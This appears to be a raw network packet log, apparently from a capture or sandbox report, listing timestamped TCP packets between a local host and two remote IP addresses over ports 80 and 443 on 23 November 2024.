                                                                                                                                                          Nov 23, 2024 12:47:19.415077925 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.416357994 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.416557074 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.416709900 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.416755915 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.418167114 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.418298960 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.418353081 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.419823885 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.419969082 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.420022964 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.421400070 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.421529055 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.421575069 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.423039913 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.423207998 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.423377991 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.424666882 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.424787045 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.424841881 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.426390886 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.426558971 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.426606894 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.428817034 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.428885937 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.428972960 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.429750919 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.429842949 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.429889917 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.431178093 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.431348085 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.431397915 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.432826996 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.432992935 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.433036089 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.434401989 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.434539080 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.434591055 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.436031103 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.436151028 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.436201096 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.437663078 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.437753916 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.437813997 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.439258099 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.439412117 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.439454079 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.440886021 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.441185951 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.441468954 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.442539930 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.442662954 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.442717075 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.444077015 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.444222927 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.444267988 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.445741892 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.445858955 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.445904016 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.447340965 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.447455883 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.447504997 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.449002028 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.449105978 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.449151993 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.450623989 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.450746059 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.450794935 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.452248096 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.452379942 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.452425957 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.453834057 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.453957081 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.453998089 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.455482006 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.455605984 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.455651999 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.457129002 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.457211018 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.457257032 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.458746910 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.458836079 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.458906889 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.460350990 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.460448980 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.460489035 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.461976051 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.462114096 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.462158918 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.463606119 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.463690042 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.463736057 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.465219021 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.465321064 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.465363026 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.467010975 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.467133045 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.467178106 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.606985092 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.607114077 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.607199907 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.607734919 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.607829094 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.608355045 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.609325886 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.609456062 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.609504938 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.610948086 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.611107111 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.612354994 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.612577915 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.612695932 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.614176035 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.614202976 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.614291906 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.614341021 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.615828991 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.615906954 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.615957975 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.617532969 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.617667913 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.617734909 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.619075060 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.619191885 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.619904041 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.620701075 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.620820045 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.620866060 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.622327089 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.622447014 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.623960972 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.624007940 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.624044895 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.624352932 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.625569105 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.625674963 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.625720024 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.627222061 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.627374887 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.627415895 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.628835917 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.628899097 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.628948927 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.630481005 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.630589962 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.630650043 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.632078886 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.632198095 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.632241011 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.633722067 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.633851051 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.633898973 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.635370970 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.635485888 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.635533094 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.636969090 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.637089968 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.637135029 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.638598919 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.638700962 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.638768911 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.640208006 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.640330076 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.641608953 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.641848087 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.641952038 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.641997099 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.643450975 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.643531084 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.643579006 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.645122051 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.645220995 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.645268917 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.646713972 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.646876097 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.647161961 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.648375988 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.648458958 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.650085926 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.650126934 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.650165081 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.650563002 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.652427912 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.652524948 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.652571917 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.653184891 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.653301954 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.654824018 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.654874086 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.654926062 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.656332970 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.656441927 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.656559944 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.658312082 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.658360958 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.658437014 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.658485889 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.659719944 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.659833908 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.659933090 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.661329031 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.661412954 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.661461115 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.662951946 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.663077116 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.663122892 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.664556026 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.664733887 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.664781094 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.666191101 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.666321039 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.667629957 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.667854071 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.667952061 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.667994976 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.669476032 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.669612885 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.669703960 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.808322906 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.808397055 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.808475971 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.808870077 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.808967113 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.809401035 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.810489893 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.811059952 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.811110973 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.811172962 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.812695980 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.812880993 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.812932014 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.814403057 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.814450979 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.814519882 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.815960884 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.816067934 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.816116095 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.817572117 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.817687035 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.817742109 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.819211960 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.819252968 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.819338083 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.820918083 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.820957899 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.821005106 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.822438955 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.822541952 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.822581053 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.824065924 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.824101925 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.824177980 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.825725079 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.825834036 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.825882912 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.827321053 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.827528000 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.827574968 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.828949928 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.829063892 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.829106092 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.830573082 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.830616951 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.830688000 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.832210064 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.832256079 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.832279921 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.833865881 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.833967924 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.834026098 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.835481882 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.835516930 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.835589886 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.837107897 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.837248087 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.837294102 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.838713884 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.838862896 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.838913918 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.840321064 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.840367079 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.840425014 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.841941118 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.841983080 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.842072964 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.843566895 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.843615055 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.843661070 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.894459963 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:23.901217937 CET49741443192.168.2.4172.67.184.174
                                                                                                                                                          Nov 23, 2024 12:47:23.901282072 CET44349741172.67.184.174192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:23.901804924 CET49741443192.168.2.4172.67.184.174
                                                                                                                                                          Nov 23, 2024 12:47:23.902909994 CET49741443192.168.2.4172.67.184.174
                                                                                                                                                          Nov 23, 2024 12:47:23.902925968 CET44349741172.67.184.174192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:25.179148912 CET44349741172.67.184.174192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:25.179692030 CET49741443192.168.2.4172.67.184.174
                                                                                                                                                          Nov 23, 2024 12:47:25.212378979 CET49741443192.168.2.4172.67.184.174
                                                                                                                                                          Nov 23, 2024 12:47:25.212409973 CET44349741172.67.184.174192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:25.213337898 CET44349741172.67.184.174192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:25.360244036 CET49741443192.168.2.4172.67.184.174
